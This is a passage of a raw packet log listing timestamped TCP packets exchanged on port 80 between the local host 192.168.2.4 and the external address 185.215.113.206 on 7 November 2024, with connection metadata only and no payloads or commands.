Nov 7, 2024 04:12:04.234092951 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.234102964 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.234139919 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.234170914 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.234184027 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.234199047 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.234210014 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.234220028 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.234222889 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.234231949 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.234237909 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.234278917 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.234385014 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.234400988 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.234419107 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.234425068 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.234435081 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.234448910 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.234460115 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.234461069 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.234502077 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.234617949 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.234652996 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.234663010 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.234668016 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.234683037 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.234692097 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.234700918 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.234714985 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.234723091 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.234734058 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.234764099 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.234767914 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.234781981 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.234795094 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.234805107 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.234842062 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.235017061 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.235029936 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.235064983 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.235083103 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.235097885 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.235111952 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.235121012 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.235126019 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.235162020 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.235188007 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.235354900 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.235369921 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.235383034 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.235394001 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.235424995 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.235426903 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.235443115 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.235455990 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.235465050 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.235498905 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.235768080 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.235790014 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.235809088 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.235811949 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.235830069 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.235846043 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.235848904 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.235858917 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.235876083 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.235879898 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.235892057 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.235905886 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.235905886 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.235919952 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.235932112 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.235935926 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.235959053 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.235971928 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.235981941 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.235994101 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236006975 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236025095 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.236028910 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236042976 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236046076 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.236057997 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236069918 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236078024 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.236084938 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236116886 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.236120939 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236135960 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236148119 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.236155033 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236167908 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236182928 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.236215115 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.236320972 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236344099 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236363888 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236366987 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.236377954 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236387968 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.236393929 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236407995 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236418009 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.236443996 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236453056 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.236460924 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236474991 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236479998 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.236490011 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236512899 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.236541986 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236552000 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.236563921 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236584902 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.236586094 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236599922 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236605883 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.236629963 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.236634970 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236646891 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236650944 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.236659050 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236670017 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.236675024 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236690044 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236701012 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.236704111 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236716986 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236727953 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.236738920 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236753941 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236756086 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.236768007 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236780882 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236788034 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.236814976 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236819983 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.236831903 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236848116 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236855030 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.236860991 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236879110 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236891985 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.236891985 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236921072 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.236926079 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236947060 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.236968994 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.236977100 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.237009048 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.237039089 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.237054110 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.237073898 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.237098932 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.237170935 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.237185001 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.237199068 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.237217903 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.237230062 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.237270117 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.237287045 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.237310886 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.237310886 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.237325907 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.237340927 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.237340927 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.237354040 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.237365007 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.237377882 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.237391949 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.237395048 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.237404108 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.237418890 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.237432957 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.237433910 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.237442970 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.237447977 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.237468004 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.237482071 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.237484932 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.237495899 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.237503052 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.237513065 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.237535000 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.237574100 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.238183022 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.238209963 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.238223076 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.238230944 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.238260984 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.238271952 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.238274097 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.238290071 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.238300085 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.238328934 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.238364935 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.238379002 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.238392115 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.238406897 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.238413095 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.238421917 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.238436937 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.238445997 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.238451958 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.238466978 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.238471985 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.238493919 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.238519907 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.238739967 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.238754988 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.238766909 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.238780975 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.238795042 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.238795996 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.238804102 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.238812923 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.238833904 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.238841057 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.238847971 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.238859892 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.238862991 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.238884926 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.238884926 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.238904953 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.238918066 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.238923073 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.238940954 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.238954067 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.238955021 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.238970041 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.238981009 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.238985062 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239000082 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239001036 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239012957 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239028931 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239034891 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239042997 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239058018 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239068031 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239088058 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239089966 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239101887 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239116907 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239116907 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239134073 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239140034 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239155054 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239168882 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239171982 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239183903 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239197969 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239206076 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239219904 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239231110 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239233017 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239248037 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239260912 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239264965 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239274979 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239278078 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239299059 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239329100 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239351988 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239366055 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239378929 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239392042 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239401102 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239408970 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239408970 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239423037 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239434958 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239435911 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239463091 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239485979 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239485025 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239500046 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239514112 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239525080 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239527941 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239542007 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239547014 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239557981 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239567041 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239579916 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239593983 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239598989 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239620924 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239638090 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239651918 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239658117 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239666939 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239672899 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239682913 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239691973 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239698887 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239712000 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239721060 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239733934 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239742994 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239747047 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239768982 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239769936 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239784002 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239794016 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239799023 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239814997 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239823103 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239828110 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239850044 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239857912 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239862919 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239872932 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239881992 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239886999 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239903927 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239909887 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239917994 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239932060 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.239942074 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239958048 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.239993095 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.347847939 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.347899914 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.347923040 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.347965956 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.347996950 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.348067999 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.348110914 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.348119020 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.348125935 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.348156929 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.348176003 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.348176003 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.348190069 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.348206043 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.348216057 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.348222971 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.348236084 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.348237991 CET	49730	80	192.168.2.4	185.215.113.206
